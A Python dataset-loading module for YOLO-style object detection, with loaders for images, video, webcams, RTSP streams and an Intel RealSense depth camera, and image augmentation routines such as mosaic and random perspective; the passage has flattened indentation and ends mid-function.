class _RepeatSampler(object):
""" Sampler that repeats forever
Args:
sampler (Sampler)
"""
def __init__(self, sampler):
self.sampler = sampler
def __iter__(self):
while True:
yield from iter(self.sampler)
class LoadImages: # for inference
def __init__(self, path, img_size=640):
p = str(Path(path)) # os-agnostic
p = os.path.abspath(p) # absolute path
if '*' in p:
files = sorted(glob.glob(p, recursive=True)) # glob
elif os.path.isdir(p):
files = sorted(glob.glob(os.path.join(p, '*.*'))) # dir
elif os.path.isfile(p):
files = [p] # files
else:
raise Exception(f'ERROR: {p} does not exist')
images = [x for x in files if x.split('.')[-1].lower() in img_formats]
videos = [x for x in files if x.split('.')[-1].lower() in vid_formats]
ni, nv = len(images), len(videos)
self.img_size = img_size
self.files = images + videos
self.nf = ni + nv # number of files
self.video_flag = [False] * ni + [True] * nv
self.mode = 'image'
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nf > 0, f'No images or videos found in {p}. ' \
f'Supported formats are:\nimages: {img_formats}\nvideos: {vid_formats}'
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nf:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nf: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
print(f'video {self.count + 1}/{self.nf} ({self.frame}/{self.nframes}) {path}: ', end='')
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, 'Image Not Found ' + path
print(f'image {self.count}/{self.nf} {path}: ', end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return path, img, img0, self.cap
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.nframes = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nf # number of files
class LoadWebcam: # for inference
def __init__(self, pipe='0', img_size=640):
self.img_size = img_size
if pipe.isnumeric():
pipe = eval(pipe) # local camera
# pipe = 'rtsp://192.168.1.64/1' # IP camera
# pipe = 'rtsp://username:password@192.168.1.64/1' # IP camera with login
# pipe = 'http://wmccpinetop.axiscam.net/mjpg/video.mjpg' # IP golf camera
self.pipe = pipe
self.cap = cv2.VideoCapture(pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
if self.pipe == 0: # local camera
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
else: # IP camera
n = 0
while True:
n += 1
self.cap.grab()
if n % 30 == 0: # skip frames
ret_val, img0 = self.cap.retrieve()
if ret_val:
break
# Print
assert ret_val, f'Camera Error {self.pipe}'
img_path = 'webcam.jpg'
print(f'webcam {self.count}: ', end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return img_path, img, img0, None
def __len__(self):
return 0
class LoadStreams: # multiple IP or RTSP cameras
def __init__(self, sources='streams.txt', img_size=640):
self.mode = 'stream'
self.img_size = img_size
if os.path.isfile(sources):
with open(sources, 'r') as f:
sources = [x.strip() for x in f.read().strip().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs = [None] * n
self.sources = [clean_str(x) for x in sources] # clean source names for later
for i, s in enumerate(sources):
# Start the thread to read frames from the video stream
print(f'{i + 1}/{n}: {s}... ', end='')
cap = cv2.VideoCapture(eval(s) if s.isnumeric() else s)
assert cap.isOpened(), f'Failed to open {s}'
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = cap.get(cv2.CAP_PROP_FPS) % 100
_, self.imgs[i] = cap.read() # guarantee first frame
thread = Thread(target=self.update, args=([i, cap]), daemon=True)
print(f' success ({w}x{h} at {fps:.2f} FPS).')
thread.start()
print('') # newline
# check for common shapes
s = np.stack([letterbox(x, new_shape=self.img_size)[0].shape for x in self.imgs], 0) # inference shapes
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
if not self.rect:
print('WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams.')
def update(self, index, cap):
# Read next stream frame in a daemon thread
n = 0
while cap.isOpened():
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n == 4: # read every 4th frame
_, self.imgs[index] = cap.retrieve()
n = 0
time.sleep(0.01) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
img0 = self.imgs.copy()
if cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img = [letterbox(x, new_shape=self.img_size, auto=self.rect)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[:, :, :, ::-1].transpose(0, 3, 1, 2) # BGR to RGB, to bsx3x416x416
img = np.ascontiguousarray(img)
return self.sources, img, img0, None
def __len__(self):
return 0 # 1E12 frames = 32 streams at 30 FPS for 30 years
class LoadRealSense2: # Stream from Intel RealSense D435
"""
https://github.com/GilbertTjahjono/Multiple_Object_Tracking
"""
def __init__(self, width=640, height=480, fps=30):
# Variabels for setup
self.mode = 'RealSense'
self.width = width
self.height = height
self.fps = fps
self.imgs = [None]
self.depths = [None]
self.img_size = 480
self.half = False
# Setup
self.pipe = rs.pipeline()
self.cfg = rs.config()
self.cfg.enable_stream(rs.stream.depth, self.width, self.height, rs.format.z16, self.fps)
self.cfg.enable_stream(rs.stream.color, self.width, self.height, rs.format.bgr8, self.fps)
# Start streaming
self.profile = self.pipe.start(self.cfg)
self.path = rs.pipeline_profile()
print(self.path)
print("streaming at w = " + str(self.width) + " h = " + str(self.height) + " fps = " + str(self.fps))
def update(self):
while True:
#Wait for frames and get the data
self.frames = self.pipe.wait_for_frames()
self.depth_frame = self.frames.get_depth_frame()
self.color_frame = self.frames.get_color_frame()
if not self.depth_frame or not self.color_frame:
continue
img0 = np.asanyarray(self.color_frame.get_data())
#align + color depth -> for display purpose only
depth0 = self.colorizing(self.aligned(self.frames))
# aligned depth -> for depth calculation
distance0, depth_intrin, aligned_depth_frame = self.aligned_depth(self.frames)
#get depth_scale
depth_scale = self.scale(self.profile)
self.imgs = np.expand_dims(img0, axis=0)
self.depths = depth0
self.distance = distance0
break
#print("ini depth awal: " + str(np.shape(self.depths)))
s = np.stack([letterbox(x, new_shape=self.img_size)[0].shape for x in self.imgs], 0) # inference shapes
#print("ini s: " + str(np.shape(s)))
self.rect = np.unique(s, axis=0).shape[0] == 1
#print("ini rect: " + str(np.shape(self.rect)))
if not self.rect:
print('WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams.')
time.sleep(0.01) # wait time
return self.rect, depth_scale, depth_intrin, aligned_depth_frame
def scale(self, profile):
depth_scale = profile.get_device().first_depth_sensor().get_depth_scale()
return depth_scale
def aligned_depth(self, frames):
self.align = rs.align(rs.stream.color)
frames = self.align.process(frames)
aligned_depth_frame = frames.get_depth_frame()
depth_real = np.asanyarray(aligned_depth_frame.get_data())
depth_intrin = aligned_depth_frame.profile.as_video_stream_profile().intrinsics
return depth_real, depth_intrin, aligned_depth_frame
def aligned(self, frames):
self.align = rs.align(rs.stream.color)
frames = self.align.process(frames)
aligned_depth_frame = frames.get_depth_frame()
return aligned_depth_frame
def colorizing(self, aligned_depth_frame):
self.colorizer = rs.colorizer()
colorized_depth = np.asanyarray(self.colorizer.colorize(aligned_depth_frame).get_data())
return(colorized_depth)
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
self.rect, depth_scale, depth_intrin, aligned_depth_frame = self.update()
img0 = self.imgs.copy()
depth = self.depths.copy()
distance = self.distance.copy()
if cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
img_path = 'realsense.mp4'
# Letterbox
img = [letterbox(x, new_shape=self.img_size, auto=self.rect)[0] for x in img0]
#print("ini img letterbox: " + str(np.shape(img)))
# Stack
img = np.stack(img, 0)
#print("ini img-padding: " + str(np.shape(img)))
# Convert Image
img = img[:, :, :, ::-1].transpose(0, 3, 1, 2) # BGR to RGB, to 3x416x416, uint8 to float32
img = np.ascontiguousarray(img)
# Return depth, depth0, img, img0
dis = {'distance': distance,
'depth_scale': depth_scale,
'depth_intrin': depth_intrin,
'aligned_depth_frame': aligned_depth_frame
}
return str(img_path), img, img0, dis
def __len__(self):
return 0 # 1E12 frames = 32 streams at 30 FPS for 30 years
def img2label_paths(img_paths):
# Define label paths as a function of image paths
sa, sb = os.sep + 'images' + os.sep, os.sep + 'labels' + os.sep # /images/, /labels/ substrings
return [x.replace(sa, sb, 1).replace('.' + x.split('.')[-1], '.txt') for x in img_paths]
class LoadImagesAndLabels(Dataset): # for training/testing
def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
cache_images=False, single_cls=False, stride=32, pad=0.0, prefix=''):
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = self.augment and not self.rect # load 4 images at a time into a mosaic (only during training)
self.mosaic_border = [-img_size // 2, -img_size // 2]
self.stride = stride
try:
f = [] # image files
for p in path if isinstance(path, list) else [path]:
p = Path(p) # os-agnostic
if p.is_dir(): # dir
f += glob.glob(str(p / '**' / '*.*'), recursive=True)
elif p.is_file(): # file
with open(p, 'r') as t:
t = t.read().strip().splitlines()
parent = str(p.parent) + os.sep
f += [x.replace('./', parent) if x.startswith('./') else x for x in t] # local to global path
else:
raise Exception(f'{prefix}{p} does not exist')
self.img_files = sorted([x.replace('/', os.sep) for x in f if x.split('.')[-1].lower() in img_formats])
assert self.img_files, f'{prefix}No images found'
except Exception as e:
raise Exception(f'{prefix}Error loading data from {path}: {e}\nSee {help_url}')
# Check cache
self.label_files = img2label_paths(self.img_files) # labels
cache_path = Path(self.label_files[0]).parent.with_suffix('.cache') # cached labels
if cache_path.is_file():
cache = torch.load(cache_path) # load
if cache['hash'] != get_hash(self.label_files + self.img_files) or 'results' not in cache: # changed
cache = self.cache_labels(cache_path, prefix) # re-cache
else:
cache = self.cache_labels(cache_path, prefix) # cache
# Display cache
[nf, nm, ne, nc, n] = cache.pop('results') # found, missing, empty, corrupted, total
desc = f"Scanning '{cache_path}' for images and labels... {nf} found, {nm} missing, {ne} empty, {nc} corrupted"
tqdm(None, desc=prefix + desc, total=n, initial=n)
assert nf > 0 or not augment, f'{prefix}No labels in {cache_path}. Can not train without labels. See {help_url}'
# Read cache
cache.pop('hash') # remove hash
labels, shapes = zip(*cache.values())
self.labels = list(labels)
self.shapes = np.array(shapes, dtype=np.float64)
self.img_files = list(cache.keys()) # update
self.label_files = img2label_paths(cache.keys()) # update
if single_cls:
for x in self.labels:
x[:, 0] = 0
n = len(shapes) # number of images
bi = np.floor(np.arange(n) / batch_size).astype(np.int) # batch index
nb = bi[-1] + 1 # number of batches
self.batch = bi # batch index of image
self.n = n
self.indices = range(n)
# Rectangular Training
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.img_files = [self.img_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.labels = [self.labels[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(np.int) * stride
# Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
self.imgs = [None] * n
if cache_images:
gb = 0 # Gigabytes of cached images
self.img_hw0, self.img_hw = [None] * n, [None] * n
results = ThreadPool(8).imap(lambda x: load_image(*x), zip(repeat(self), range(n))) # 8 threads
pbar = tqdm(enumerate(results), total=n)
for i, x in pbar:
self.imgs[i], self.img_hw0[i], self.img_hw[i] = x # img, hw_original, hw_resized = load_image(self, i)
gb += self.imgs[i].nbytes
pbar.desc = f'{prefix}Caching images ({gb / 1E9:.1f}GB)'
def cache_labels(self, path=Path('./labels.cache'), prefix=''):
# Cache dataset labels, check images and read shapes
x = {} # dict
nm, nf, ne, nc = 0, 0, 0, 0 # number missing, found, empty, duplicate
pbar = tqdm(zip(self.img_files, self.label_files), desc='Scanning images', total=len(self.img_files))
for i, (im_file, lb_file) in enumerate(pbar):
try:
# verify images
im = Image.open(im_file)
im.verify() # PIL verify
shape = exif_size(im) # image size
assert (shape[0] > 9) & (shape[1] > 9), 'image size <10 pixels'
# verify labels
if os.path.isfile(lb_file):
nf += 1 # label found
with open(lb_file, 'r') as f:
l = np.array([x.split() for x in f.read().strip().splitlines()], dtype=np.float32) # labels
if len(l):
assert l.shape[1] == 5, 'labels require 5 columns each'
assert (l >= 0).all(), 'negative labels'
assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels'
assert np.unique(l, axis=0).shape[0] == l.shape[0], 'duplicate labels'
else:
ne += 1 # label empty
l = np.zeros((0, 5), dtype=np.float32)
else:
nm += 1 # label missing
l = np.zeros((0, 5), dtype=np.float32)
x[im_file] = [l, shape]
except Exception as e:
nc += 1
print(f'{prefix}WARNING: Ignoring corrupted image and/or label {im_file}: {e}')
pbar.desc = f"{prefix}Scanning '{path.parent / path.stem}' for images and labels... " \
f"{nf} found, {nm} missing, {ne} empty, {nc} corrupted"
if nf == 0:
print(f'{prefix}WARNING: No labels found in {path}. See {help_url}')
x['hash'] = get_hash(self.label_files + self.img_files)
x['results'] = [nf, nm, ne, nc, i + 1]
torch.save(x, path) # save for next time
logging.info(f'{prefix}New cache created: {path}')
return x
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
index = self.indices[index] # linear, shuffled, or image_weights
hyp = self.hyp
mosaic = self.mosaic and random.random() < hyp['mosaic']
if mosaic:
# Load mosaic
img, labels = load_mosaic(self, index)
shapes = None
# MixUp https://arxiv.org/pdf/1710.09412.pdf
if random.random() < hyp['mixup']:
img2, labels2 = load_mosaic(self, random.randint(0, self.n - 1))
r = np.random.beta(8.0, 8.0) # mixup ratio, alpha=beta=8.0
img = (img * r + img2 * (1 - r)).astype(np.uint8)
labels = np.concatenate((labels, labels2), 0)
else:
# Load image
img, (h0, w0), (h, w) = load_image(self, index)
# Letterbox
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
labels = self.labels[index].copy()
if labels.size: # normalized xywh to pixel xyxy format
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], ratio[0] * w, ratio[1] * h, padw=pad[0], padh=pad[1])
if self.augment:
# Augment imagespace
if not mosaic:
img, labels = random_perspective(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'],
perspective=hyp['perspective'])
# Augment colorspace
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
# Apply cutouts
# if random.random() < 0.9:
# labels = cutout(img, labels)
nL = len(labels) # number of labels
if nL:
labels[:, 1:5] = xyxy2xywh(labels[:, 1:5]) # convert xyxy to xywh
labels[:, [2, 4]] /= img.shape[0] # normalized height 0-1
labels[:, [1, 3]] /= img.shape[1] # normalized width 0-1
if self.augment:
# flip up-down
if random.random() < hyp['flipud']:
img = np.flipud(img)
if nL:
labels[:, 2] = 1 - labels[:, 2]
# flip left-right
if random.random() < hyp['fliplr']:
img = np.fliplr(img)
if nL:
labels[:, 1] = 1 - labels[:, 1]
labels_out = torch.zeros((nL, 6))
if nL:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.img_files[index], shapes
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, shapes
@staticmethod
def collate_fn4(batch):
img, label, path, shapes = zip(*batch) # transposed
n = len(shapes) // 4
img4, label4, path4, shapes4 = [], [], path[:n], shapes[:n]
ho = torch.tensor([[0., 0, 0, 1, 0, 0]])
wo = torch.tensor([[0., 0, 1, 0, 0, 0]])
s = torch.tensor([[1, 1, .5, .5, .5, .5]]) # scale
for i in range(n): # zidane torch.zeros(16,3,720,1280) # BCHW
i *= 4
if random.random() < 0.5:
im = F.interpolate(img[i].unsqueeze(0).float(), scale_factor=2., mode='bilinear', align_corners=False)[
0].type(img[i].type())
l = label[i]
else:
im = torch.cat((torch.cat((img[i], img[i + 1]), 1), torch.cat((img[i + 2], img[i + 3]), 1)), 2)
l = torch.cat((label[i], label[i + 1] + ho, label[i + 2] + wo, label[i + 3] + ho + wo), 0) * s
img4.append(im)
label4.append(l)
for i, l in enumerate(label4):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img4, 0), torch.cat(label4, 0), path4, shapes4
# Ancillary functions --------------------------------------------------------------------------------------------------
def load_image(self, index):
# loads 1 image from dataset, returns img, original hw, resized hw
img = self.imgs[index]
if img is None: # not cached
path = self.img_files[index]
img = cv2.imread(path) # BGR
assert img is not None, 'Image Not Found ' + path
h0, w0 = img.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # resize image to img_size
if r != 1: # always resize down, only resize up if training with augmentation
interp = cv2.INTER_AREA if r < 1 and not self.augment else cv2.INTER_LINEAR
img = cv2.resize(img, (int(w0 * r), int(h0 * r)), interpolation=interp)
return img, (h0, w0), img.shape[:2] # img, hw_original, hw_resized
else:
return self.imgs[index], self.img_hw0[index], self.img_hw[index] # img, hw_original, hw_resized
def augment_hsv(img, hgain=0.5, sgain=0.5, vgain=0.5):
r = np.random.uniform(-1, 1, 3) * [hgain, sgain, vgain] + 1 # random gains
hue, sat, val = cv2.split(cv2.cvtColor(img, cv2.COLOR_BGR2HSV))
dtype = img.dtype # uint8
x = np.arange(0, 256, dtype=np.int16)
lut_hue = ((x * r[0]) % 180).astype(dtype)
lut_sat = np.clip(x * r[1], 0, 255).astype(dtype)
lut_val = np.clip(x * r[2], 0, 255).astype(dtype)
img_hsv = cv2.merge((cv2.LUT(hue, lut_hue), cv2.LUT(sat, lut_sat), cv2.LUT(val, lut_val))).astype(dtype)
cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img) # no return needed
# Histogram equalization
# if random.random() < 0.2:
# for i in range(3):
# img[:, :, i] = cv2.equalizeHist(img[:, :, i])
def load_mosaic(self, index):
# loads images in a 4-mosaic
labels4 = []
s = self.img_size
yc, xc = [int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border] # mosaic center x, y
indices = [index] + [self.indices[random.randint(0, self.n - 1)] for _ in range(3)] # 3 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img4
if i == 0: # top left
img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, w, min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
labels = self.labels[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padw, padh) # normalized xywh to pixel xyxy format
labels4.append(labels)
# Concat/clip labels
if len(labels4):
labels4 = np.concatenate(labels4, 0)
np.clip(labels4[:, 1:], 0, 2 * s, out=labels4[:, 1:]) # use with random_perspective
# img4, labels4 = replicate(img4, labels4) # replicate
# Augment
img4, labels4 = random_perspective(img4, labels4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img4, labels4
def load_mosaic9(self, index):
# loads images in a 9-mosaic
labels9 = []
s = self.img_size
indices = [index] + [self.indices[random.randint(0, self.n - 1)] for _ in range(8)] # 8 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img9
if i == 0: # center
img9 = np.full((s * 3, s * 3, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
h0, w0 = h, w
c = s, s, s + w, s + h # xmin, ymin, xmax, ymax (base) coordinates
elif i == 1: # top
c = s, s - h, s + w, s
elif i == 2: # top right
c = s + wp, s - h, s + wp + w, s
elif i == 3: # right
c = s + w0, s, s + w0 + w, s + h
elif i == 4: # bottom right
c = s + w0, s + hp, s + w0 + w, s + hp + h
elif i == 5: # bottom
c = s + w0 - w, s + h0, s + w0, s + h0 + h
elif i == 6: # bottom left
c = s + w0 - wp - w, s + h0, s + w0 - wp, s + h0 + h
elif i == 7: # left
c = s - w, s + h0 - h, s, s + h0
elif i == 8: # top left
c = s - w, s + h0 - hp - h, s, s + h0 - hp
padx, pady = c[:2]
x1, y1, x2, y2 = [max(x, 0) for x in c] # allocate coords
# Labels
labels = self.labels[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padx, pady) # normalized xywh to pixel xyxy format
labels9.append(labels)
# Image
img9[y1:y2, x1:x2] = img[y1 - pady:, x1 - padx:] # img9[ymin:ymax, xmin:xmax]
hp, wp = h, w # height, width previous
# Offset
yc, xc = [int(random.uniform(0, s)) for x in self.mosaic_border] # mosaic center x, y
img9 = img9[yc:yc + 2 * s, xc:xc + 2 * s]
# Concat/clip labels
if len(labels9):
labels9 = np.concatenate(labels9, 0)
labels9[:, [1, 3]] -= xc
labels9[:, [2, 4]] -= yc
np.clip(labels9[:, 1:], 0, 2 * s, out=labels9[:, 1:]) # use with random_perspective
# img9, labels9 = replicate(img9, labels9) # replicate
# Augment
img9, labels9 = random_perspective(img9, labels9,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img9, labels9
def replicate(img, labels):
# Replicate labels
h, w = img.shape[:2]
boxes = labels[:, 1:].astype(int)
x1, y1, x2, y2 = boxes.T
s = ((x2 - x1) + (y2 - y1)) / 2 # side length (pixels)
for i in s.argsort()[:round(s.size * 0.5)]: # smallest indices
x1b, y1b, x2b, y2b = boxes[i]
bh, bw = y2b - y1b, x2b - x1b
yc, xc = int(random.uniform(0, h - bh)), int(random.uniform(0, w - bw)) # offset x, y
x1a, y1a, x2a, y2a = [xc, yc, xc + bw, yc + bh]
img[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
labels = np.append(labels, [[labels[i, 0], x1a, y1a, x2a, y2a]], axis=0)
return img, labels
def letterbox(img, new_shape=(640, 640), color=(114, 114, 114), auto=True, scaleFill=False, scaleup=True):
# Resize image to a 32-pixel-multiple rectangle https://github.com/ultralytics/yolov3/issues/232
shape = img.shape[:2] # current shape [height, width]
if isinstance(new_shape, int):
new_shape = (new_shape, new_shape)
# Scale ratio (new / old)
r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])
if not scaleup: # only scale down, do not scale up (for better test mAP)
r = min(r, 1.0)
# Compute padding
ratio = r, r # width, height ratios
new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))
dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding
if auto: # minimum rectangle
dw, dh = np.mod(dw, 32), np.mod(dh, 32) # wh padding
elif scaleFill: # stretch
dw, dh = 0.0, 0.0
new_unpad = (new_shape[1], new_shape[0])
ratio = new_shape[1] / shape[1], new_shape[0] / shape[0] # width, height ratios
dw /= 2 # divide padding into 2 sides
dh /= 2
if shape[::-1] != new_unpad: # resize
img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)
top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border
return img, ratio, (dw, dh)
def random_perspective(img, targets=(), degrees=10, translate=.1, scale=.1, shear=10, perspective=0.0, border=(0, 0)):
# torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))
# targets = [cls, xyxy]
height = img.shape[0] + border[0] * 2 # shape(h,w,c)
width = img.shape[1] + border[1] * 2
# Center
C = np.eye(3)
C[0, 2] = -img.shape[1] / 2 # x translation (pixels)
C[1, 2] = -img.shape[0] / 2 # y translation (pixels)
# Perspective
P = np.eye(3)
P[2, 0] = random.uniform(-perspective, perspective) # x perspective (about y)
P[2, 1] = random.uniform(-perspective, perspective) # y perspective (about x)
# Rotation and Scale
R = np.eye(3)
a = random.uniform(-degrees, degrees)
# a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations
s = random.uniform(1 - scale, 1 + scale)
# s = 2 ** random.uniform(-scale, scale)
R[:2] = cv2.getRotationMatrix2D(angle=a, center=(0, 0), scale=s)
# Shear
S = np.eye(3)
S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # x shear (deg)
S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # y shear (deg)
# Translation
T = np.eye(3)
T[0, 2] = random.uniform(0.5 - translate, 0.5 + translate) * width # x translation (pixels)
T[1, 2] = random.uniform(0.5 - translate, 0.5 + translate) * height # y translation (pixels)
# Combined rotation matrix
M = T @ S @ R @ P @ C # order of operations (right to left) is IMPORTANT
if (border[0] != 0) or (border[1] != 0) or (M != np.eye(3)).any(): # image changed
if perspective:
img = cv2.warpPerspective(img, M, dsize=(width, height), borderValue=(114, 114, 114))
else: # affine
img = cv2.warpAffine(img, M[:2], dsize=(width, height), borderValue=(114, 114, 114))
# Visualize
# import matplotlib.pyplot as plt
# ax = plt.subplots(1, 2, figsize=(12, 6))[1].ravel()
# ax[0].imshow(img[:, :, ::-1]) # base
# ax[1].imshow(img2[:, :, ::-1]) # warped
# Transform label coordinates
n = len(targets)
if n:
# warp points
xy = np.ones((n * 4, 3))
xy[:, :2] = targets[:, [1, 2, 3, 4, 1, 4, 3, 2]].reshape(n * 4, 2) # x1y1, x2y2, x1y2, x2y1
xy = xy @ M.T # transform
if perspective:
xy = (xy[:, :2] / xy[:, 2:3]).reshape(n, 8) # rescale
else: # affine
xy = xy[:, :2].reshape(n, 8)
# create new boxes
x = xy[:, [0, 2, 4, 6]]
y = xy[:, [1, 3, 5, 7]]
xy = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T
# # apply angle-based reduction of bounding boxes
# radians = a * math.pi / 180
# reduction = max(abs(math.sin(radians)), abs(math.cos(radians))) ** 0.5
# x = (xy[:, 2] + xy[:, 0]) / 2
# y = (xy[:, 3] + xy[:, 1]) / 2
# w = (xy[:, 2] - xy[:, 0]) * reduction
# h = (xy[:, 3] - xy[:, 1]) * reduction
# xy = np.concatenate((x - w / 2, y - h / 2, x + w / 2, y + h / 2)).reshape(4, n).T
# clip boxes
xy[:, [0, 2]] = xy[:, [0, 2]].clip(0, width)
xy[:, [1, 3]] = xy[:, [1, 3]].clip(0, height)
# filter candidates
i = box_candidates(box1=targets[:, 1:5].T * s, box2=xy.T)
targets = targets[i]
targets[:, 1:5] = xy[i]
return img, targets
def box_candidates(box1, box2, wh_thr=2, ar_thr=20, area_thr=0.1, eps=1e-16): # box1(4,n), box2(4,n)
# Compute candidate boxes: box1 before augment, box2 after augment, wh_thr (pixels), aspect_ratio_thr, area_ratio
w1, h1 = box1[2] - box1[0], box1[3] - box1[1]
w2, h2 = box2[2] - box2[0], box2[3] - box2[1]
ar = np.maximum(w2 / (h2 + eps), h2 / (w2 + eps)) # aspect ratio
return (w2 > wh_thr) & (h2 > wh_thr) & (w2 * h2 / (w1 * h1 + eps) > area_thr) & (ar < ar_thr) # candidates
def cutout(image, labels):
# Applies image cutout augmentation https://arxiv.org/abs/1708.04552
h, w = image.shape[:2]
def bbox_ioa(box1, box2):
